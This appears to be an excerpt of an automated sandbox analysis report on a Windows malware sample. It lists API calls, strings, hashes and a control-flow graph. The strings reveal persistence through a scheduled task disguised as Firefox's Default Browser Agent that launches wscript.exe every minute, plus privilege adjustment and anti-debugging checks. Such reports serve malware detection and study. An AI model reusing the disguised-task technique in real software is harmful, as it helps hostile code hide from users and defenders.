      • CryptAcquireContextA.ADVAPI32(005AA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 005A8481
      • CoInitializeEx.OLE32(00000000,00000000), ref: 005A84CC
      • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 005A84E3
      • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 005A8502
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
      • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
      • API String ID: 267019445-2941900213
      • Opcode ID: 4ad34b55e052c627de7130db5ebbb2d76c32b0a3f4768c16116edca77249eb01
      • Instruction ID: 30f150177517b4b38b7b58f87e63e8bb10d074c8cb3ea7243287f555413ca3db
      • Opcode Fuzzy Hash: 4ad34b55e052c627de7130db5ebbb2d76c32b0a3f4768c16116edca77249eb01
      • Instruction Fuzzy Hash: F941E670A40308AFEB20DB60DD4EFAD7B78FB16705F108065F605EA1D2EBB05A48DB95
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CryptGenRandom.ADVAPI32(00000020,?), ref: 005A8F38
        • Part of subcall function 005A2630: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,005A8F85,00000000), ref: 005A2652
        • Part of subcall function 005A2630: HeapAlloc.KERNEL32(00000000,?,?,?,?,005A8F85,00000000), ref: 005A2659
      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A8F95
      • HeapFree.KERNEL32(00000000), ref: 005A8F9C
      • wsprintfA.USER32 ref: 005A8FCF
      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A9008
      • HeapFree.KERNEL32(00000000), ref: 005A900B
      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A9010
      • HeapFree.KERNEL32(00000000), ref: 005A9013
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: Heap$Process$Free$AllocCryptRandomwsprintf
      • String ID: %d|%s|%s|%s$VoYGkc5R
      • API String ID: 4113358155-4073333701
      • Opcode ID: 18acb15bc2045a5586cab438664e33c3188cf7d56bc2c40d9c1f274baec7622e
      • Instruction ID: 2f27551eda7d998b08ded19eda25573120799a9b461be85f7e54b10afadbf58b
      • Opcode Fuzzy Hash: 18acb15bc2045a5586cab438664e33c3188cf7d56bc2c40d9c1f274baec7622e
      • Instruction Fuzzy Hash: 0A21B571A003086BEB1097A49C0EFAF7E79FB46704F040124FA05AB1C2EA659909C7A6
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • VariantInit.OLEAUT32(?), ref: 005A6AD7
      • CoCreateInstance.OLE32(005A1020,00000000,00000001,005A1000,?), ref: 005A6AF4
      • SysAllocString.OLEAUT32(\Mozilla), ref: 005A6B34
      • SysFreeString.OLEAUT32(?), ref: 005A6B6B
      • SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 005A6B78
      • SysFreeString.OLEAUT32(00000000), ref: 005A6B8F
      Strings
      • Firefox Default Browser Agent 458046B0AF4A39CB, xrefs: 005A6B73
      • \Mozilla, xrefs: 005A6B2F
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: String$AllocFree$CreateInitInstanceVariant
      • String ID: Firefox Default Browser Agent 458046B0AF4A39CB$\Mozilla
      • API String ID: 478541636-252850850
      • Opcode ID: 2121eeaa088bb9d3d88249c5ea91be2502a4c7d141fb1537aea30c36e4ada561
      • Instruction ID: fd5162319f4bd90fdeb2274f73f3bb5da1823938d971c2f1b93891765d6812df
      • Opcode Fuzzy Hash: 2121eeaa088bb9d3d88249c5ea91be2502a4c7d141fb1537aea30c36e4ada561
      • Instruction Fuzzy Hash: 7E317074F00258AFE7009B68CC89BAEBFB8FF4A305F044198E945E7251D671AD85CBA1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetCurrentProcess.KERNEL32(00000028,?), ref: 005A620D
      • OpenProcessToken.ADVAPI32(00000000), ref: 005A6214
      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 005A6229
      • CloseHandle.KERNEL32(?), ref: 005A6236
      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 005A6260
      • CloseHandle.KERNEL32(?), ref: 005A626B
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
      • String ID: SeShutdownPrivilege
      • API String ID: 158869116-3733053543
      • Opcode ID: 2b7bf8b8e5b65758f8b39c3e3aeebd27a1fbd2df212cac6759444d4c9ab564c2
      • Instruction ID: ff9dad5c70e72834ce09769ef404c670b3a02451d333b9c54ef9c16b3530d7f5
      • Opcode Fuzzy Hash: 2b7bf8b8e5b65758f8b39c3e3aeebd27a1fbd2df212cac6759444d4c9ab564c2
      • Instruction Fuzzy Hash: 09014F35A40218BBEB109BA09D0EBEF7BB8FB05701F100154B904A6191D7715E18A7A1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FB4228
      • IsDebuggerPresent.KERNEL32 ref: 00FB42F4
      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FB4314
      • UnhandledExceptionFilter.KERNEL32(?), ref: 00FB431E
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
      • String ID:
      • API String ID: 254469556-0
      • Opcode ID: a79a902ff34c98115f1ce99119d0dd6879cc2ecff05b06402862c6a4232d98a5
      • Instruction ID: 79d9bcdab080bc46612c267245ba1745281a5652bb15c78a3896d0d6d32bc672
      • Opcode Fuzzy Hash: a79a902ff34c98115f1ce99119d0dd6879cc2ecff05b06402862c6a4232d98a5
      • Instruction Fuzzy Hash: FE312975D4521CDBDB10DFA5DE8ABCDBBB8BF08304F1040AAE40CAB251EB759A859F44
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00FB6A53
      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00FB6A5D
      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00FB6A6A
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: ExceptionFilterUnhandled$DebuggerPresent
      • String ID:
      • API String ID: 3906539128-0
      • Opcode ID: 5889ff6aadf7254b84b2ac70d92174fa486accf345e9415ea6e3525db6655336
      • Instruction ID: 67f279a0ad415a7048a00c321d8439d0214335572f7df301f9f5d27c8f2902e0
      • Opcode Fuzzy Hash: 5889ff6aadf7254b84b2ac70d92174fa486accf345e9415ea6e3525db6655336
      • Instruction Fuzzy Hash: E631D27494122C9BCB21DF25DD89BDCBBB8BF08310F5081EAE41CA7251E734AB859F44
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetCurrentProcess.KERNEL32(?,?,00FB75A1,?,?,?,?,?,00FBC8FA), ref: 00FB75C4
      • TerminateProcess.KERNEL32(00000000,?,00FB75A1,?,?,?,?,?,00FBC8FA), ref: 00FB75CB
      • ExitProcess.KERNEL32 ref: 00FB75DD
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: Process$CurrentExitTerminate
      • String ID:
      • API String ID: 1703294689-0
      • Opcode ID: 30d348132ac4017b3b9289eb6d3b9e11e65a990b9025cc1fb60ec3879aa4fa1a
      • Instruction ID: 1b421bd70c862c4193518245d382cccf6a61193d3331680e850ad03c734d005b
      • Opcode Fuzzy Hash: 30d348132ac4017b3b9289eb6d3b9e11e65a990b9025cc1fb60ec3879aa4fa1a
      • Instruction Fuzzy Hash: 9BE04631448288ABCF213F15CE4AD883B69FB81352F100010FA0586132CB39DD92EF50
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FBE878,?,?,00000008,?,?,00FBE510,00000000), ref: 00FBEAAA
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: ExceptionRaise
      • String ID:
      • API String ID: 3997070919-0
      • Opcode ID: c649b98d156a46cfd1fc27fbc6b47870bc95bc39a12e1a810895fc48d741d2ff
      • Instruction ID: acc35d396a77b0081e7d5513b76289d1dbeba178f6f7a1c5c637e81d9acc7cb3
      • Opcode Fuzzy Hash: c649b98d156a46cfd1fc27fbc6b47870bc95bc39a12e1a810895fc48d741d2ff
      • Instruction Fuzzy Hash: 3DB13932A10609DFD718CF29C486BE57BA0FF45364F298658E89ACF2A1C335E991DF40
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FB44DB
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: FeaturePresentProcessor
      • String ID:
      • API String ID: 2325560087-0
      • Opcode ID: c0ee7600c721f8a9a4210c69e8ac20a83d6d2ad1ec8dc946fe1941f4640c1ebe
      • Instruction ID: f7dab8e09dbb3d0a261a001c19342bae4f4c40b89f0579fdf7d2ff1f5e5820ad
      • Opcode Fuzzy Hash: c0ee7600c721f8a9a4210c69e8ac20a83d6d2ad1ec8dc946fe1941f4640c1ebe
      • Instruction Fuzzy Hash: FF51B8B1E016198FDB28CF59DA86B9EBBF0FB48360F14842AD401EB251DB74E941EF50
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: d4be6771d56c3ed59c3432d7c320487790cb4c5a074a8accac0640832697912c
      • Instruction ID: ecdf0f6ea36981bd34612658f50de241b6bd3c75dd1ecf2c6b845d67fce3677a
      • Opcode Fuzzy Hash: d4be6771d56c3ed59c3432d7c320487790cb4c5a074a8accac0640832697912c
      • Instruction Fuzzy Hash: F331A0B2900219AFCB24DE6ACC89DEB7BADEBC4350F548158F91597240EE30AE41DE50
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: CountTick
      • String ID:
      • API String ID: 536389180-0
      • Opcode ID: 4e03e929300577b5517363fd8dee14eb36406371d76b7d2575a842878f175bab
      • Instruction ID: 58b8204672cc958809dd9d2eae68a698a56a703d1eb1594d0bb7bfe6150fc037
      • Opcode Fuzzy Hash: 4e03e929300577b5517363fd8dee14eb36406371d76b7d2575a842878f175bab
      • Instruction Fuzzy Hash: BE31C3727104018FC74CCF2CEC9AA2977E5F79F310B158629E52ACB2A0E770E85ADB41
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • SetUnhandledExceptionFilter.KERNEL32(Function_000043BB,00FB3BBB), ref: 00FB43B4
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: ExceptionFilterUnhandled
      • String ID:
      • API String ID: 3192549508-0
      • Opcode ID: d889ab228e4923bf8a608b50e285ff58caca2ae7bc828bd43ba7c22a1239ab11
      • Instruction ID: e001a5222cb14756094811e753f66b7cbfa58501ea345539d8b5e8c8a39a2916
      • Opcode Fuzzy Hash: d889ab228e4923bf8a608b50e285ff58caca2ae7bc828bd43ba7c22a1239ab11
      • Instruction Fuzzy Hash:
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID:
      • String ID: 0
      • API String ID: 0-4108050209
      • Opcode ID: 97408d208d436d56f55ab8464978196798b9c5da84c9ea22eb9ce05b42d4b2d2
      • Instruction ID: e2bc6d53142a34428658796146022662732cad6821020a506e479c7d0ff9b4d6
      • Opcode Fuzzy Hash: 97408d208d436d56f55ab8464978196798b9c5da84c9ea22eb9ce05b42d4b2d2
      • Instruction Fuzzy Hash: 5151D331E182DC4EDF1D8BEC88542ECBFB1AF57200F5441BEDC9AAB643D5284A49CB61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: HeapProcess
      • String ID:
      • API String ID: 54951025-0
      • Opcode ID: a4418388432c6526736f6cf0986750d1e93bf90a7a7617c76ad5d96a74c4bf30
      • Instruction ID: dd80ec5bc6b500e616a14d09ba72f4c5c7f68b0d0989fd9ad1b730e9422abf4b
      • Opcode Fuzzy Hash: a4418388432c6526736f6cf0986750d1e93bf90a7a7617c76ad5d96a74c4bf30
      • Instruction Fuzzy Hash: 95A012306001448B5300CF315B0B648369C670168031440545005C3120DB2440506611
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 5af9fe35f410722b11439b25dc8b12d495b6d2046dea1679e4726e7ad0816820
      • Instruction ID: 21bcd49688500d44c3537db910acc6f151195e29ad0d90501387f078f8602659
      • Opcode Fuzzy Hash: 5af9fe35f410722b11439b25dc8b12d495b6d2046dea1679e4726e7ad0816820
      • Instruction Fuzzy Hash: DC722D3481819A8EDB18EB68D86AAEC7B74FF53300F5401FDD44A13957AF311A8ACF65
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
      • Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
      • Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
      • Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
      • Instruction ID: 05caf322940a0fb899fade441a676c798b499b5233bcc57d424d17a3546c2bed
      • Opcode Fuzzy Hash: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
      • Instruction Fuzzy Hash: 7CE08C72925238EBCB24DF8EC944A8AF7ECEB84B50B254496B601D3101C6B4DF04DBD0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 277 5a6bb0-5a6c09 VariantInit CoCreateInstance 278 5a6c0b-5a6c3a 277->278 279 5a6c69 277->279 278->279 285 5a6c3c-5a6c5c SysAllocString 278->285 280 5a6c6c-5a6c6f 279->280 282 5a6c73-5a6c7b 280->282 283 5a6c7d-5a6c7e SysFreeString 282->283 284 5a6c80-5a6c84 282->284 283->284 286 5a6fda-5a6fdf 284->286 287 5a6c8a-5a6cbb SysAllocString SysFreeString 284->287 285->280 292 5a6c5e-5a6c67 285->292 288 5a6fe1-5a6fe3 286->288 289 5a6fe7-5a6ff0 286->289 293 5a6cdd-5a6cdf 287->293 294 5a6cbd-5a6cda SysAllocString SysFreeString 287->294 288->289 292->282 295 5a6cf9-5a6d11 293->295 296 5a6ce1-5a6cf7 SysAllocString SysFreeString 293->296 294->293 300 5a6fd1-5a6fd5 295->300 301 5a6d17-5a6d2d 295->301 296->295 300->286 303 5a6d2f-5a6d6b SysAllocString SysFreeString SysAllocString SysFreeString 301->303 304 5a6d70-5a6d86 301->304 303->304 307 5a6d88-5a6dcf SysAllocString SysFreeString 304->307 308 5a6dd4-5a6df8 304->308 307->308 313 5a6dfe-5a6e0f 308->313 314 5a6e96-5a6e9b 308->314 313->314 322 5a6e15-5a6e28 313->322 315 5a6e9d-5a6e9f 314->315 316 5a6ea3-5a6ea8 314->316 315->316 318 5a6eaa-5a6eac 316->318 319 5a6eb0-5a6ed4 316->319 318->319 326 5a6f36-5a6f3b 319->326 327 5a6ed6-5a6ee7 319->327 322->314 328 5a6e2a-5a6e6c SysAllocString SysFreeString SysAllocString SysFreeString 322->328 329 5a6f3d-5a6f3f 326->329 330 5a6f43-5a6f48 326->330 327->326 336 5a6ee9-5a6efc 327->336 345 5a6e6e-5a6e88 SysAllocString SysFreeString 328->345 346 5a6e8d-5a6e91 328->346 329->330 332 5a6f4a-5a6f4c 330->332 333 5a6f50-5a6f54 330->333 332->333 337 5a6fc8-5a6fcc 333->337 338 5a6f56-5a6fc2 VariantInit SysAllocString * 2 SysFreeString VariantClear 333->338 336->326 342 5a6efe-5a6f19 SysAllocString SysFreeString 336->342 337->300 338->337 347 5a6f1b-5a6f2b SysAllocString SysFreeString 342->347 348 5a6f2d-5a6f31 342->348 345->346 346->314 347->348 348->326
      APIs
      • VariantInit.OLEAUT32(?), ref: 005A6BCE
      • CoCreateInstance.OLE32(005A1020,00000000,00000001,005A1000,?,?,75920EE0), ref: 005A6BFB
      • SysAllocString.OLEAUT32(005A1498), ref: 005A6C41
      • SysFreeString.OLEAUT32(?), ref: 005A6C7E
      • SysAllocString.OLEAUT32(\Mozilla), ref: 005A6C8F
      • SysFreeString.OLEAUT32(00000000), ref: 005A6CB1
      • SysAllocString.OLEAUT32(\Mozilla), ref: 005A6CC2
      • SysFreeString.OLEAUT32(00000000), ref: 005A6CD8
      • SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 005A6CE6
      • SysFreeString.OLEAUT32(00000000), ref: 005A6CF7
      • SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 005A6D34
      • SysFreeString.OLEAUT32(00000000), ref: 005A6D43
      • SysAllocString.OLEAUT32(Mozilla), ref: 005A6D4A
      • SysFreeString.OLEAUT32(00000000), ref: 005A6D59
      • SysAllocString.OLEAUT32(PT0S), ref: 005A6DAE
      • SysFreeString.OLEAUT32(00000000), ref: 005A6DBD
      • SysAllocString.OLEAUT32(Trigger1), ref: 005A6E2F
      • SysFreeString.OLEAUT32(00000000), ref: 005A6E3E
      • SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 005A6E45
      • SysFreeString.OLEAUT32(00000000), ref: 005A6E54
      • SysAllocString.OLEAUT32(PT1M), ref: 005A6E73
      • SysFreeString.OLEAUT32(00000000), ref: 005A6E82
      • SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 005A6F03
      • SysFreeString.OLEAUT32(00000000), ref: 005A6F12
      • SysAllocString.OLEAUT32(?), ref: 005A6F1C
      • SysFreeString.OLEAUT32(00000000), ref: 005A6F2B
      • VariantInit.OLEAUT32(?), ref: 005A6F5A
      • SysAllocString.OLEAUT32(005A113C), ref: 005A6F6E
      • SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 005A6F7F
      • SysFreeString.OLEAUT32(00000000), ref: 005A6FBC
      • VariantClear.OLEAUT32(?), ref: 005A6FC2
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
      • String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 458046B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
      • API String ID: 3904693211-711907784
      • Opcode ID: b72effa7f543e079a4e1eca231a7003a60452f6d926d21e68b047dfd6accc944
      • Instruction ID: 28654acd32d82e85f43ab99f35596dae99ee6033021834022db996e71a92b268
      • Opcode Fuzzy Hash: b72effa7f543e079a4e1eca231a7003a60452f6d926d21e68b047dfd6accc944
      • Instruction Fuzzy Hash: FCF1FA74A00219AFDB10DBA9C948FAEBBF8FF4A314F144158F509EB250DB71AD45CB61
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
